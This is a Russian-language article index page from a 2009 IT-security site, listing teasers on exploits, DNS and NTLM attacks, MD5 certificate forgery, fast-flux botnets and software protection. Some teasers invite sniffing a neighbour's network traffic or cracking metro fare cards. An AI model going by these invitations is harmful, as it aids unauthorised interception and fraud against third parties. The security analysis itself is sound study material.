| RSS



Меню

Bookmark and Share


Статистика
Ваш IP: 3.144.113.30
Вы используете: v





Сейчас на сайте:

Тех поддержка ->

Облако тэгов
ОС видио Tor Обратная сторона антенна 4.6 PHP Эксплоит Windows Server 2008 qip Virtual chroot kernel proc sysctl tune FreeBSD bridge Boot Disk Bluetooth GEO game directx Emulator Python Shell DDoS червь Conficker вирус троян Лаборатория Касперского пиратство apple iPhone ИТ-отрасль Щеголев Microsoft экономический кризис Twitter социальная сеть анонимность Лицензия Open Source ASP.NET MVC уязвимость MySQL база данных файлообмен закон франция пират Skype мобильный Deutsche Telekom Хакер киберпреступник Trend Micro кибератака Германия робот утечка данных персональные данные ноутбук интернет Китай цензура ядро Linux Торвальдс Windows Vista Acer Linux патент браузер Firefox Internet Explorer Opera Net Applications Safari Intel Linux Foundation Moblin Oracle патч банкомат кардер HSM IBM X-Force Cofee сша кибервойна Эстония Dell ИТ-специалист хакерские атаки Pirate Bay контроль кибербезопасность язык программирования The Pirate Bay Пиратская партия утечка информации приговор Mozilla Chrome безопасность Госдума СМИ Windows 8 Баллмер взлом Пентагон ботнет Украина Facebook Cisco cloud Windows XP нетбук торрент музыка биометрический nokia ФБР IP-адрес CIPAV Comcast sms RSA java Google CAPTCHA Symantec спам конфиденциальная информация инсайдер Perimetrix антивирус тест Anti-Malware Windows 7 операционная система Windows провайдер авторское право RapidShare UNIX свиной грипп шантаж дети EFF BluWiki копирайт экстремизм Panda Security cloud computing McAfee Cybercrime Response Unit Bottle Domains HTTPS ICANN студент шпионское ПО Норвегия школьник New York Times XSS YouTube Warner Music кибершпионаж КНДР Ubuntu свободное ПО AMD ATI касперский Россия РФ сервер хостинг фальшивый антивирус Comodo CA Wi-Fi D-Link суд пароль блог фишинг Одноклассники медведев контрафакт мошенник штраф Sony GPS по Gumblar JAVASCRIPT хакеры вредоносное ПО Yahoo ФАС компьютер Софт MPAA кибероружие PandaLabs Red Hat Минкомсвязи сбой ASUSTeK Computer мошенничество Доктор Веб ВКонтакте Cyber-Arc исходный код PCI DSS МВД фильтр порнография BREIN свобода слова Казахстан GEMA Autodesk сисадмин Gmail кредитная карта кибермошенник LiveJournal шифрование криптография Deep Purple банк нанотехнологии Wikipedia zero-day ColdFusion выборы кража данных DNS BIND Android BASIC атака Black Hat Mac OS X Click Forensics Clampi домен фсб Прокуратура Уголовное дело icq Barrelfish киберпреступность Sophos AT&T ошибка Electa Gamma Knife OpenBSD DARPA военные Сайт Visual Studio 2010 .NET Framework 4 Chrome OS электронная почта турция конференция спамер FTC полиция российская ОС Koobface Великобритания БЕЛОРУССИЯ грузия BSA Bittorrent облачные вычисления Azure Европа Dr.Web Билл Гейтс спецслужбы Cryzip Живой Журнал Royal Bank of Scotland смартфон Canonical Pwn2Own F-Secure Symbian Hotmail фильм

Главная » Статьи

Всего материалов в каталоге: 357
Показано материалов: 151-200
Страницы: « 1 2 3 4 5 6 7 8 »

Один из самых больших плюсов свободного ПО – это возможность создавать дистрибутив для собственных нужд. Сейчас доступно несколько десятков дистрибутивов, упрощающих работу админа. Выбор среди специализированных дистрибутивов на базе LiveCD действительно огромен, и здесь важно не запутаться и подыскать себе именно тот инструмент, который максимально подойдет под решение твоих задач.

У админов очень популярен целый класс дистрибутивов, реализующих функции маршрутизатора и брандмауэра. К свободным ОС многие пользователи приходят именно после знакомства с одной из подобных систем. Но есть и другие решения, с помощью которых просто установить и настроить веб или почтовый сервер, программную АТС на базе Asterisk и т.д. Все они в той или иной мере направлены на решение задач по организации определенного сервиса. Кроме того, существует великое множество дистрибутивов, направленных на обслуживание компьютеров и сетей. Именно о таких решениях и пойдет речь в этой статье. Для удобства разделим их на несколько групп:

  • дистры для работы с жестким диском;
  • для восстановления работоспособности системы и резервирования данных;
  • для тестирования на наличие уязвимостей;
  • для исследования после взлома.
Общие Статьи | Просмотров: 2238 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

Название данного материала может показаться странным. Операционная система MS-DOS, традиционно ассоциируемая с 16-битными процессорами и программами, уже давно вышла из широкого употребления на персональных компьютерах и забыта многими пользователями как безнадежно устаревшая. В то же время, несмотря на то, что прошло более 5 лет с момента выхода 64-битных процессоров x86, время полноценного использования 64-битных вычислений на платформе PC еще не пришло.

Так в чем же смысл совмещения этих двух представителей разных эпох: старой 16-битной системы MS-DOS и нового 64-битного режима работы процессора?

Общие Статьи | Просмотров: 1702 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

Любой мало-мальски сложный проект одному не поднять. Нет, конечно, можно постараться и через пару лет выдать полусырой продукт, но зачем? Ведь гораздо веселее, быстрее и эффективнее работается в команде. А чтобы делать это умеючи, придется выделить время и освоить полезные инструменты.

Умное слово «collaborate» сейчас популярно как никогда. Поддержка «совместной работы», а именно так оно переводится, означает, что сервис предоставляет возможность одновременной работы сразу для нескольких пользователей, которые трудятся над решением общей задачи. Причем, у каких-то сервисов коллективный труд является лишь одной из опций, а у других – непосредственным предназначением. К сожалению, «collaborate» реальную возможность работать коллективом обозначает далеко не всегда, а среди сервисов, по-настоящему поддерживающих совместную работу, бесплатны лишь некоторые. Можно долго хвалить всемирно известный инструмент Basecamp, предназначенный для управления проектами, но весь мед портит ложка дегтя. За пользование им придется выкладывать $24 в месяц – и это, замечу, минимум! С полгода назад взявшись наладить порядок в делах, я принялся за поиск полезных и бесплатных инструментов, которые помогли бы помочь в коллективной работе. И вот что у меня получилось.

Общие Статьи | Просмотров: 2181 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

Каждый раз, когда я получаю подарок мои мысли крутятся вокруг его истории. Откуда он пришел? Кто работал над ним? То кто работал - думал ли он что его работа закончит свой путь в моих руках?

А как насчет нашего выпуска Phrack?

Phrack пришел из андеграунда, андеграунд работает над ним, предлагает статьи, посылает отзывы, комментарии, проводит длинные ночи в чатах, читая, ДЫША. Дышит ли по прежнему андеграунд?

Вещи меняются, все меняется. Как хакеры мы получаем удовольствие, радость. Мы хотим эту радость. Взлом это и есть радость. Ты знаешь это потому что ты занимаешься этим, потому что ты проводишь ночь за ночью в этой чертовой радости, уходя спать в 6 утра и вставая тремя часами позже для того, что бы доставить тело в школу или на работу в то время как твоя голова по прежнему будет работать над поставленной задачей. По прежнему ли ты испытываешь радость?

Пожалуйста, не принимай это близко к сердцу, не переусердствуй в своей реакции. Это всего лишь вопрос. Вопрос который каждый должен задавать себе каждый день вне зависимости от того, что он делает. РАДОСТЬ это не единственная ОПЛАТА. Мы разумные, мы любим получать поздравления, кто не любит?Мы ЛЮБИМ смотреть как наша маленькая работа распространяется вокруг. Мы любим звук клап-клап-клап. Но действительно ли все сводится только к этому?

Общие Статьи | Просмотров: 1842 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

Человек всегда знал, что делает его человеком – способность к самовыражению, творчеству. Культура, искусство, письменность – это краеугольные грани нашей цивилизации, на которых зиждется подёрнутый плесенью веков интеллектуальный и технологический фундамент. Я мыслю – значит существую? Оставьте это наивным философам древности. Я мыслю и творю – вот значит и существую.

Исходя из этого, мне особенно странно смотреть на мир сейчас. Компьютеры уже перешагнули последнюю грань, отделяющую разумных существ от неразумных, но по улицам не носятся религиозные фанатики с криком «они пришли из серверной!!», а правительство страны не принимает экстренные законы по запрету на общение с кофеварками. Мир, вроде, ничего и не заметил. А в то же самое время компьютеры научились писать стихи и романы, сочинять музыку и творить живопись. Без компьютерного моделирования не обходятся больше архитекторы, художники и студенты физмата. Мы всё чаще заменяем собственные мыслительные процессы синтетическим суррогатом компьютерных моделей. И что?

Общие Статьи | Просмотров: 1638 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

В сентябре 2008 датчики распределенных антивирусных сетей зафиксировали необычную активность — эпидемия малвари нового поколения начала свое распространение практически одновременно с Индонезии, Вьетнама и Таиланда, обходя антивирусные преграды на форсаже. Я это дело раскрутил, написав пару POC’ов, демонстрирующих технику сокрытия истинной точки входа в файл. Это актуально не только для зловредных программ, но и для легальных протекторов.

История началась еще несколько лет назад, когда я ковырял червей, обходивших персональные брандмауэры путем создания удаленного потока и вызывавших API-вызов CreateRemoteThread. В качестве стартового адреса ему передавался указатель на вредоносный код, впрыснутый в адресное пространство жертвы — например, выделением памяти на куче с последующим копированием shell-кода API-вызовом WriteProcessMemory. Чтобы «выкупить» левые потоки, достаточно взглянуть на их стартовый адрес. У «нормальных» потоков он указывает в область страничного имиджа PE-файла, а у «рукотворных» — лежит в стеке, куче (или еще непонятно где).

Общие Статьи | Просмотров: 2123 | Добавил: aka_kludge | Дата: 06.03.2009 | Комментарии (0)

Сегодня каждая компания использует электронную почту как одно из основных средств коммуникаций в бизнесе. Необходимым условием эффективного применения почты является наличие специальной программы - почтового сервера. Создавать корпоративные ящики с помощью публичных сервисов в Интернете уже давно считается своеобразным дурным тоном. К тому же, такой подход совершенно небезопасен и сопровождается трудностями в управлении.

Несмотря на то, что объем продаж почтовых серверов нельзя назвать огромным, этот рыночный сегмент весьма интересен. Во-первых, он многогранен - на нем можно увидеть около десятка серьезных игроков, среди которых присутствуют крупные транснациональные корпорации, небольшие стартапы и даже разработчики-энтузиасты. При этом каждая из перечисленных групп играет довольно заметную роль. Во-вторых, на фоне всеобщей тенденции к легализации программного обеспечения, рынок почтовых серверов стремительно развивается и наращивает собственные объемы.

Настоящее исследование является первым российским проектом, призванным оценить текущую ситуацию на отечественном рынке почтовых серверов. В рамках исследования дается обзор положения каждого из игроков данного рынка, а также сильных и слабых сторон соответствующих игрокам продуктов.

Общие Статьи | Просмотров: 2412 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Сегодня каждая компания использует электронную почту как одно из основных средств коммуникаций в бизнесе. Необходимым условием эффективного применения почты является наличие специальной программы - почтового сервера. Создавать корпоративные ящики с помощью публичных сервисов в Интернете уже давно считается своеобразным дурным тоном. К тому же, такой подход совершенно небезопасен и сопровождается трудностями в управлении.

Несмотря на то, что объем продаж почтовых серверов нельзя назвать огромным, этот рыночный сегмент весьма интересен. Во-первых, он многогранен - на нем можно увидеть около десятка серьезных игроков, среди которых присутствуют крупные транснациональные корпорации, небольшие стартапы и даже разработчики-энтузиасты. При этом каждая из перечисленных групп играет довольно заметную роль. Во-вторых, на фоне всеобщей тенденции к легализации программного обеспечения, рынок почтовых серверов стремительно развивается и наращивает собственные объемы.

Настоящее исследование является первым российским проектом, призванным оценить текущую ситуацию на отечественном рынке почтовых серверов. В рамках исследования дается обзор положения каждого из игроков данного рынка, а также сильных и слабых сторон соответствующих игрокам продуктов.

Общие Статьи | Просмотров: 3178 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

1) Предисловие

Краткий обзор: Данная статья предназначена для ознакомления читателя с технологией перенаправления ассоциации, а также тем, как с ее помощью можно реализовать некий аналог сетей VLAN с применением проводных технологий и стандарта IEEE 802.11. Данная технология интересна тем, что она может быть реализована на стороне клиента без нарушения стандарта IEEE 802.11, необходимы лишь незначительные изменения в точке доступа (Access Point, AP). В МАС 802.11 изменения не вносятся. Автор статьи надеется, что после ее прочтения читатель не только поймет особенности конкретной технологии, описанной ниже, но также впредь будет рассматривать особенности протоколов в новом ракурсе.

Общие Статьи | Просмотров: 2066 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Во вторник, 27 мая 2008 года компания Symantec опубликовала на сайте Securityfocus.com уведомление о неизвестной уязвимости (BID 29386) в Adobe Flash Player версий 9.0.115.0 и 9.0.124.0, ссылаясь на обнаруженные попытки эксплуатации. Через несколько часов в блоге SANS появилось уведомление о zero-day эксплоите, эксплуатирующем уязвимость в последней версии Flash Player. Новость об этом быстро разлетелась и многие СМИ и security-компании, доверяя компетентному источнику (Symantec), опубликовали уведомления о критической уязвимости:

http://secunia.com/advisories/30404/
http://www.frsirt.com/english/advisories/2008/1662
http://www.securitylab.ru/vulnerability/353662.php
http://www.kb.cert.org/vuls/id/395473
http://www.securityfocus.com/bid/29386
http://blog.trendmicro.com/flash-bugs-exploited-in-latest-mass-compromise/
http://www.f-secure.com/weblog/archives/00001446.html
http://www.net-security.org/secworld.php?id=6169
и многие другие.

После проведенного анализа существующих эксплоитов компаниями Adobe и Symantec было выяснено, что эксплуатируемая уязвимость была устранена в предыдущем обновлении (http://www.securitylab.ru/vulnerability/350671.php #2 (CVE-2007-0071)) и версия 9.0.124.0 не уязвима. Об этом стало известно вчера вечером после сообщения на сайте Symantec и подтверждено сегодня компанией Adobe.


Общие Статьи | Просмотров: 1641 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Краткое предисловие

DNS является одним из самых критичных компонентов сети Интернет, поэтому уязвимости в серверах имен всегда вызывали повышенный интерес у злоумышленников. 8-9 июля многие производители выпустили исправления, устраняющие фунаментальную ошибку, которая позволяет злоумышленнику произвести спуфинг атаку. Дэн Камински в своем блоге http://www.doxpara.com/?p=1165 опубликовал более подробное описание уязвимости и сделал доступным эксплоит.

Общие Статьи | Просмотров: 1725 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

О проблемах безопасности протоколов LM/NTLM сказано немало. Поэтому для того, чтобы в очередной раз поднимать эту тему, нужны некоторые причины. И такие причины есть. Во-первых, опыт проведения аудита в крупных корпоративных сетях наглядно показывает: по состоянию на конец 2008 года даже старый LanManager кое-где еще живее всех живых. Иными словами, данная статья, как и приведенная в статье утилита, никогда не были бы написаны, если бы их актуальность не была подтверждена регулярной практикой. Вторая причина является следствием первой и заключается в регулярном появлении на известных конференциях по безопасности (BlackHat, Defcon) материалов на заданную тематику, как и различного вида программных средств для проведения атак на NTLM-хэши. Поэтому скептикам, приготовившим аргумент в виде слова "Kerberos", рекомендуется глубоко вдохнуть и пойти проверить свою Windows-сеть на наличие описываемых проблем.


Общие Статьи | Просмотров: 2883 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Обе эти уязвимости связаны с обработкой RPC запросов и представляют большую опасность для пользователей, которые не установили исправления. Уязвимость в службе Server в данный момент эксплуатируется червем Gimmiv.A. По данным SANS в данный момент существует два варианта распространения: посредством самого эксплоита и через P2P сеть (Emule).


Общие Статьи | Просмотров: 3377 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Многие центры сертификации до сих пор используют MD5 хеши для проверки подлинности сертификатов. С 2004 года достоверно известно, что MD5 хеши являются слабыми с криптографической точки зрения. Злоумышленник может создать фальшивый сертификат-посредник центра сертификации (CA), и с его помощью, подписать произвольное количество сертификатов, например, для Web серверов, которые будут считаться доверенными для коневых сертификатов – тех, которые находятся в «доверенном списке» в вашем браузере. Александру Сотирову, Марку Стивенсу и Джекобу Аппельбауму удалось создать фальшивый сертификат, выдающий себя за подлинный сертификат от RapidSSL. Для генерации фальшивого сертификата было сделано 4 покупки действительных сертификатов у RapidSSL, и использовался кластер из 200 станций Sony PlayStation 3 для коллизионной атаки. В основе атаки лежит метод обнаружения коллизий в MD5 хешах. В данный момент атака считается сложно реализуемой, но продемонстрированной на практике.
Исследователи собрали 30 000 сертификатов для Web серверов, 9 000 из которых были подписаны MD5, 97% сертификатов принадлежали RapidSSL.
Общие Статьи | Просмотров: 1967 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Широкое распространение беспроводных устройств и их небольшая стоимость приводят к тому, что в периметре сетевой безопасности возникают бреши. Здесь речь идет не только о злоумышленниках, подключивших КПК с поддержкой Wi-Fi к проводной сети компании, но и о более тривиальных вещах. Активный беспроводной адаптер на подключенном к корпоративной сети ноутбуке, принесенная из дома для тестирования точка доступа - все это может стать удобными каналами для проникновения во внутреннюю сеть.

Недостаточная аутентификация, ошибки в системе разграничения доступа позволяют осуществлять несанкционированное подключение. Различные методы атак на Bluetooth и Wi-Fi, направленные на реализацию этих угроз, будут рассмотрены в этой и последующих главах книги.

Специфика беспроводных сетей подразумевает, что данные могут быть перехвачены и изменены в любой момент. Для одних технологий достаточно стандартного беспроводного адаптера, для других требуется специализированное оборудование. Но в любом случае, эти угроза реализуются достаточно просто, и для противостояния им требуются эффективные криптографические механизмы защиты данных.

Общие Статьи | Просмотров: 2013 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Протокол Remote Desktop создан компанией Microsoft для обеспечения удаленного доступа к серверам и рабочим станциям Windows. Протокол RDP рассчитан на использование ресурсов высокопроизводительного сервера терминалов многими менее производительными рабочими станциями. Впервые сервер терминалов (версия 4.0) появился в 1998 году в составе Windows NT 4.0 Terminal Server, на момент написания статьи (январь 2009 года) последней версией терминального сервера является версия 6.1, включенная в дистрибутивы Windows 2008 Server и Windows Vista SP1. В настоящее время RDP является основным протоколом удаленного доступа для систем семейства Windows, а клиентские приложения существуют как для OC от Microsoft, так и для Linux, FreeBSD, MAC OS X и др.

Говоря об истории появления RDP, нельзя не упомянуть компанию Citrix. Citrix Systems в 1990-х годах специализировалась на многопользовательских системах и технологиях удаленного доступа. После приобретения лицензии на исходные коды Windows NT 3.51 в 1995 году эта компания выпустила многопользовательскую версию Windows NT, известную как WinFrame. В 1997 году Citrix Systems и Microsoft заключили договор, по которому многопользовательская среда Windows NT 4.0 базировалась на технологических разработках Citrix. В свою очередь Citrix Systems отказалась от распространения полноценной операционной системы и получала право на разработку и реализацию расширений для продуктов Microsoft. Данные расширения изначально назывались MetaFrame. Права на ICA (Independent Computing Architecture), прикладной протокол взаимодействия тонких клиентов с сервером приложений Citrix, остались за Citrix Systems, а протокол Microsoft RDP строился на базе ITU T.120.


Общие Статьи | Просмотров: 4213 | Добавил: aka_kludge | Дата: 16.02.2009 | Комментарии (0)

Итак, общее количество найденных уязвимостей с июля по декабрь составило 1467. Традиционно бОльшая часть публикаций относится к программному обеспечению. Из новостей, относящихся к аппаратным средствам, стоит выделить угрозы использующие особенности реализаций роутеров (маршрутизаторов). Так довольно большое количество эксплойтов было сформировано для устройств Cisco Systems, в частности Cisco Adaptive Security Appliance и Cisco PIX.

Как и в прошлом периоде прослеживается тенденция к увеличению числа удаленных уязвимостей по сравнению с локальными. Большая часть уязвимостей была опубликована с эксплойтами.

Общие Статьи | Просмотров: 2040 | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Ты мастер взлома и шпионского софта, ты знаешь самые изощренные дырки и эксплойты. Твой сосед подключен к другой локалке, но тебе так хочется поснифать его траф, что зудит во всех местах сразу. Немного разведки и затык: он юзает исключительно витую пару. «Как быть?» - крутится у тебя в голове. Вот тут я собираюсь поведать тебе, что все возможно в нашем мире. Для начала определимся с тем, что не будем лезть в мельчайшие подробности стандарта IEEE Std 802.3. Этот стандарт о том самом Ethernet, который тебе знаком по витухе, торчащей из всех щелей твоего убежища. Зато уделим больше внимания возможностям незаметного снятия данных с той самой витой пары, что вызывает хакерский зуд. Я соседскую имею в виду. Используй эти возможности с умом и осторожностью.
Общие Статьи | Просмотров: 2506 | Author: Крис Касперски | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Сегодня мы поговорим о сравнительно новом и малоизвестном семействе хакерских атак, направленных на неинициализированные указатели. В качестве подопытной лабораторной крысы будем использовать свежие дыры в IE, допускающие удаленный захват управления с передачей управления на shell-код. Обсудим и перспективы атак на другие приложения.

Идея использовать неинициализированные переменные для локальных/удаленных атак пришла в хакерские головы еще лет десять тому назад. Однако, ни одного работоспособного exploit'а за минувшее время не появилось. Почему? В отличие от переполняющихся буферов (легко обнаруживаемых fuzzer'ами), поиск неинициализированных указателей требует кропотливого ручного анализа кода и творческого вдохновения. Без него разобраться в вековых наслоениях пластов различных модулей (по которым можно изучать хронологию развития Си++) не так-то просто, если вообще возможно.

Общие Статьи | Просмотров: 1596 | Author: Крис Касперски | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Недавно обнаруженная известным IT Security специалистом Стефаном Эссером уязвимость в интерпретаторе PHP теоретически может затронуть миллионы веб-сайтов, на которых используется PHP<=5.2.5. Тебе интересно, в чем суть уязвимости? В статье я разобрал advisory бага по полочкам.

Баг затрагивает функции генерации псевдослучайных чисел rand() и mt_rand(). Зачастую они используются для создания паролей, сессий, кукисов и других различных конфиденциальных данных пользователя.

Rand() — это просто враппер для библиотеки libc rand(), а mt_rand() — враппер для генератора псевдослучайных чисел Mersenne Twister. Обе функции используют так называемый seed (семя), который можно задавать соответственно функциями srand() и mt_srand(). По дефолту сид представляет собой 32‑битный DWORD (2 в 32 степени или 4294967296 комбинаций). Обычно такой длины достаточно, чтобы обеспечить криптографическую стойкость приложения. Ведь для брутфорса пароля, сгенерированного с помощью одной из этих функций, необходимо знать не только сид, но и сгенерированные на его основе числа. Впрочем, существует ряд ситуаций, в которых брутфорс вполне применим...

Общие Статьи | Просмотров: 1926 | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Одной из самых реальных угроз, с которой нам приходится сталкиваться в сети Интернет, является киберпреступность. Причем преступники постоянно совершенствуют орудия получения ими незаконной выгоды. Данная работа призвана рассказать о все более популярной методике под названием fast-flux (в дословном переводе – "быстрое течение, поток"), число случаев использования которой в открытой среде постоянно увеличивается. Сервисные сети fast-flux представляют собой сети скомпрометированных компьютеров с публичными именами DNS записей, которые постоянно меняются, иногда несколько раз в минуту. Такая постоянно изменяющаяся архитектура существенно осложняет отслеживание и пресечение преступной деятельности.

В этом исследовании мы сначала опишем, что же такое сервисные сети fast-flux, как они работают, как преступники используют их для достижения своих целей, и изучим два типа таких сетей, которые мы назвали однопоточными и двухпоточными сетями fast-flux, после чего приведем несколько свежих примеров работы подобных сетей в реальном мире. Затем мы расскажем как работает вредоносное ПО, связанное с организацией сетей fast-flux и представим результаты исследования, в ходе которого мы умышленно заразили нашу приманку агентом сети fast-flux. Ну и наконец, мы поясним, как находить и определять такие сети, а также минимизировать ущерб от их работы, преимущественно в больших сетевых окружениях.

Общие Статьи | Просмотров: 2236 | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Одной из самых реальных угроз, с которой нам приходится сталкиваться в сети Интернет, является киберпреступность. Причем преступники постоянно совершенствуют орудия получения ими незаконной выгоды. Данная работа призвана рассказать о все более популярной методике под названием fast-flux (в дословном переводе – "быстрое течение, поток"), число случаев использования которой в открытой среде постоянно увеличивается. Сервисные сети fast-flux представляют собой сети скомпрометированных компьютеров с публичными именами DNS записей, которые постоянно меняются, иногда несколько раз в минуту. Такая постоянно изменяющаяся архитектура существенно осложняет отслеживание и пресечение преступной деятельности.

В этом исследовании мы сначала опишем, что же такое сервисные сети fast-flux, как они работают, как преступники используют их для достижения своих целей, и изучим два типа таких сетей, которые мы назвали однопоточными и двухпоточными сетями fast-flux, после чего приведем несколько свежих примеров работы подобных сетей в реальном мире. Затем мы расскажем как работает вредоносное ПО, связанное с организацией сетей fast-flux и представим результаты исследования, в ходе которого мы умышленно заразили нашу приманку агентом сети fast-flux. Ну и наконец, мы поясним, как находить и определять такие сети, а также минимизировать ущерб от их работы, преимущественно в больших сетевых окружениях.

Общие Статьи | Просмотров: 1691 | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Знакомо ли тебе желание разгадать все загадки да вскрыть все защиты Московского Метрополитена? Сделать, например, себе «вечный билет»? Но ведь специалисты метро постоянно находят все более изощренные способы защиты. Металлические жетоны сменились пластиковыми, те, в свою очередь, магнитными билетами, а на смену магнитным пришли бесконтактные карты. У многих исследователей опустились руки — кажется, будто Метрополитен стал неприступной крепостью. Но любую защиту можно обойти. И зачастую, вскрыть ее оказывается в разы проще, чем построить...
Общие Статьи | Просмотров: 2759 | Добавил: LeadyTOR | Дата: 16.02.2009 | Комментарии (0)

Алгоритмы хеширования – это математические функции, позволяющие снимать своеобразный "отпечаток пальца" с данных. Они являются краеугольным камнем всей компьютерной безопасности. Такие отпечатки, называемые хешами, используются в системах управления паролями и в инфраструктурах открытых ключей (PKI), делая онлайн-шоппинг сравнительно безопасным. Кроме этого, они применяются и в системах распространения файлов. В каждом из этих случаев использование хешей обусловлено одной общей чертой, присущей всем алгоритмам хеширования – все они являются односторонними функциями.

В идеале не существует никаких практических способов установить, из каких входных данных был сгенерирован хэш, равно как не существует возможности создать такие входные данные, которые в итоге дали бы одинаковое значение хэша. Например, база данных паролей обычно содержит лишь хэши пользовательских паролей, и даже если хакеру удастся прочесть содержимое этой базы, залогиниться в системе он не сможет, поскольку никакой возможности восстановить пароль из хэша в базе данных нет.

Общие Статьи | Просмотров: 2256 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Ситуация, когда на одной рабочей станции не установлены последние заплатки, на другой не работает брандмауэр, а на третьей - антивирус или антишпионское ПО, встречается сплошь и рядом. А ведь безопасность всей Сети определяется самым слабым звеном. Как же быть администратору с клиентскими компьютерами, не удовлетворяющими требованиям безопасности?
Общие Статьи | Просмотров: 2460 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Недавно обнаруженная известным IT Security специалистом Стефаном Эссером уязвимость в интерпретаторе PHP теоретически может затронуть миллионы веб-сайтов, на которых используется PHP<=5.2.5. Тебе интересно, в чем суть уязвимости? В статье я разобрал advisory бага по полочкам.

Баг затрагивает функции генерации псевдослучайных чисел rand() и mt_rand(). Зачастую они используются для создания паролей, сессий, кукисов и других различных конфиденциальных данных пользователя.

Rand() — это просто враппер для библиотеки libc rand(), а mt_rand() — враппер для генератора псевдослучайных чисел Mersenne Twister. Обе функции используют так называемый seed (семя), который можно задавать соответственно функциями srand() и mt_srand(). По дефолту сид представляет собой 32‑битный DWORD (2 в 32 степени или 4294967296 комбинаций). Обычно такой длины достаточно, чтобы обеспечить криптографическую стойкость приложения. Ведь для брутфорса пароля, сгенерированного с помощью одной из этих функций, необходимо знать не только сид, но и сгенерированные на его основе числа. Впрочем, существует ряд ситуаций, в которых брутфорс вполне прим
Общие Статьи | Просмотров: 2231 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Криптографии в разработке системных и не только приложениях принято уделять повышенное внимание. Особенно сейчас, когда набитость сундуков многих благородных сэров, как и степень их свободы, напрямую зависит от степени защиты их конфиденциальной информации. Чтобы сэкономить время и не ходить лишний раз к проктологу, воспользуемся тем, что большинство стойких и эффективных алгоритмов уже реализовано профессионалами этого дела. Плод их трудов открыто предоставляется на коммерческой и бесплатной основе. Разработчики операционных систем тоже не сидят сложа руки, предоставляя разработчикам специальные API. В этой статье мы хотим рассказать об использовании таких API в модуле для операционной системы Linux, который будет шифровать исходящий трафик и расшифровывать входящий.
Общие Статьи | Просмотров: 1953 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Ограничение доступа к какой-либо области сайта обычно выглядит однообразно: каждому пользователю выдается логин и пароль или он сам их выбирает, и для входа в защищенную часть сайта их нужно ввести. С технической же точки зрения для проверки пароля используются разные методы. Для ввода логина и пароля может использоваться HTML-форма. В этом случае пароль передается на сервер открытым текстом в POST-запросе. Это неприемлемо, если пользователь сидит в локалке, где возможно использование снифера. Для решения этой проблемы придуман метод аутентификации с помощью хешей, при котором пароль не передается, а передается хеш строка, зависящая от пароля, некоего одноразового параметра и, возможно, еще от каких-либо параметров. Этот метод еще называют challenge/response, поскольку при его использовании клиент получает запрос с одноразовым параметром и посылает ответ, содержащий хеш. На уровне протокола HTTP 1.1 возможна аутентификация методом Basic, что ни чем не лучше использования HTML-формы, и Digest, который мы и рассмотрим подробно.
Общие Статьи | Просмотров: 2871 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Интернет пережил пик своего бурного развития и сейчас собственных сайтов нет разве что у домашних животных (хотя некоторые маргиналы умудряются вести блоги за своих питомцев). Если проанализировать и сопоставить количество созданных ресурсов и количество более-менее разбирающихся в вопросах обеспечения сетевой безопасности людей, мы получим довольно прискорбную картину. Главным бичом сайтостроительства, как я считаю, являются свободно распространяемые скрипты. Так уж вышло, что за годы через мои руки прошло огромное количество подобных творений, и зачастую они оставляют весьма дурное впечатление. Самое ужасное – это их открытый код, в котором хакеры выискивают тонны уязвимостей, и часто встречающееся доверие к таким скриптам пользователей, считающих создателей если не небожителями, то уж точно кевинмитниками от программирования.

В данной статье я дам практические советы по обеспечению безопасности динамического веб-проекта, поделюсь нестандартными методами защиты. Много практики и минимум теории – её ищите в мануалах и книгах, а также на просторах Сети. Кроме того, я не буду заострять внимание на всем известных багах навроде “ядерного нуля” – читайте “Хакер”, и будет вам счастье.
Общие Статьи | Просмотров: 2006 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

Способы взлома программных защит ты и без меня знаешь (подчеркиваю, что мы будем говорить о программных защитах, так как всякие хаспы простому смертному кодеру с его программой «Яйца» не очень доступны). А если не знаешь, то в двух словах: патчат двоичный код или пишут кейген. Возможны и другие методы взлома, я тебе назвал два основных, знакомых всем нам на практике. Чувствуешь, что эти два метода принципиально разные? Каждый из них по отдельности может привести к необходимому результату – несанкционированному использованию твоих «Яиц».

Значит, и защита должна состоять как минимум из двух более-менее независимых компонентов (кто в курсах, это модель элементарной защиты с двумя звеньями).

Первый компонент отвечает за целостность программы (ну или только системы защиты – можно ведь контролировать целостность не всей программы, а только защитного механизма). Мне захотелось этот компонент назвать физической защитой. Реализовываться она может по-разному: например, можно осуществлять превентивный контроль, запрещая любую запись в exe-файл. Можно не разрешать использование модифицированных файлов. То есть изменять изменяй, но ни в коем случае не используй. Последний вариант мне показался более приемлемым, и я его и забабахал в свой патент как часть способа защиты ПО от несанкционированного использования. Но что-то мы отвлеклись, сегодняшняя наша цель – борьба с кейгенами!

Общие Статьи | Просмотров: 2404 | Добавил: aka_kludge | Дата: 26.01.2009 | Комментарии (0)

